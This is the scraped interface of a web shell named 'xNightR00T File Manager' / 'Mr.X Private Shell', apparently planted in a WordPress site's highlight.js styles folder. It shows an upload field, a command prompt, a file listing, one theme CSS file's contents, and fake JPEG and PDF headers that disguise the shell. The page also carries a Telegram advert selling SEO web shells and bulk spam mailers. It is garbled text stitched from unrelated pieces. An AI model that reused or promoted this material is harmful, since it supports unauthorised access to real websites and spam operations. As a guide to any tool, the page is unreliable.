xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/*
  codepen.io Embed Theme
  Author: Justin Perry <http://github.com/ourmaninamsterdam>
  Original theme - https://github.com/chriskempson/tomorrow-theme
*/

.hljs {
  display: block;
  overflow-x: auto;
  padding: 0.5em;
  background: #222;
  color: #fff;
  font-family: Menlo, Monaco, 'Andale Mono', 'Lucida Console', 'Courier New', monospace;
}

.hljs-comment,
.hljs-title {
  color: #777;
}

.hljs-variable,
.hljs-attribute,
.hljs-tag,
.hljs-regexp,
.ruby .constant,
.xml .tag .title,
.xml .pi,
.xml .doctype,
.html .doctype {
  color: #ab875d;
}

.css .value {
  color: #cd6a51;
}

.css .value .function,
.css .value .string {
  color: #a67f59;
}

.css .value .number {
  color: #9b869c;
}

.css .id,
.css .class,
.css-pseudo,
.css .selector,
.css .tag {
  color: #dfc48c;
}

.hljs-number,
.hljs-preprocessor,
.hljs-built_in,
.hljs-literal,
.hljs-params,
.hljs-constant {
  color: #ab875d;
}

.ruby .class .title,
.css .rules .attribute {
  color: #9b869b;
}

.hljs-string,
.hljs-value,
.hljs-inheritance,
.hljs-header,
.ruby .symbol,
.xml .cdata {
  color: #8f9c6c;
}

.css .hexcolor {
  color: #cd6a51;
}

.function,
.python .decorator,
.python .title,
.ruby .function .title,
.ruby .title .keyword,
.perl .sub,
.javascript .title,
.coffeescript .title {
  color: #fff;
}

.hljs-keyword,
.javascript .function {
  color: #8f9c6c;
}

.coffeescript .javascript,
.javascript,
.javascript .xml,
.tex .formula,
.xml .javascript,
.xml .vbscript,
.xml .css,
.xml .cdata {
    background: transparent;
    opacity: 1;
}

Filemanager

Name Type Size Permission Actions
arta.css File 2.18 KB 0644
ascetic.css File 830 B 0644
atelier-dune.dark.css File 1.7 KB 0644
atelier-dune.light.css File 1.71 KB 0644
atelier-forest.dark.css File 1.72 KB 0644
atelier-forest.light.css File 1.73 KB 0644
atelier-heath.dark.css File 1.71 KB 0644
atelier-heath.light.css File 1.72 KB 0644
atelier-lakeside.dark.css File 1.74 KB 0644
atelier-lakeside.light.css File 1.75 KB 0644
atelier-seaside.dark.css File 1.73 KB 0644
atelier-seaside.light.css File 1.74 KB 0644
brown_paper.css File 1.73 KB 0644
brown_papersq.png File 17.77 KB 0644
codepen-embed.css File 1.48 KB 0644
color-brewer.css File 2.74 KB 0644
dark.css File 1.7 KB 0644
default.css File 2.54 KB 0644
docco.css File 1.77 KB 0644
far.css File 1.81 KB 0644
foundation.css File 1.57 KB 0644
github.css File 1.68 KB 0644
googlecode.css File 2.09 KB 0644
hybrid.css File 2.61 KB 0644
idea.css File 1.73 KB 0644
ir_black.css File 1.45 KB 0644
kimbie.dark.css File 1.51 KB 0644
kimbie.light.css File 1.51 KB 0644
magula.css File 1.83 KB 0644
mono-blue.css File 923 B 0644
monokai.css File 1.95 KB 0644
monokai_sublime.css File 2.28 KB 0644
obsidian.css File 2.2 KB 0644
paraiso.dark.css File 1.48 KB 0644
paraiso.light.css File 1.48 KB 0644
pojoaque.css File 1.62 KB 0644
pojoaque.jpg File 1.16 KB 0644
railscasts.css File 2.51 KB 0644
rainbow.css File 1.58 KB 0644
school_book.css File 1.92 KB 0644
school_book.png File 486 B 0644
solarized_dark.css File 1.58 KB 0644
solarized_light.css File 1.58 KB 0644
sunburst.css File 2.21 KB 0644
tomorrow-night-blue.css File 1.58 KB 0644
tomorrow-night-bright.css File 1.52 KB 0644
tomorrow-night-eighties.css File 1.52 KB 0644
tomorrow-night.css File 1.58 KB 0644
tomorrow.css File 1.42 KB 0644
vs.css File 1.5 KB 0644
xcode.css File 2.22 KB 0644
zenburn.css File 1.81 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml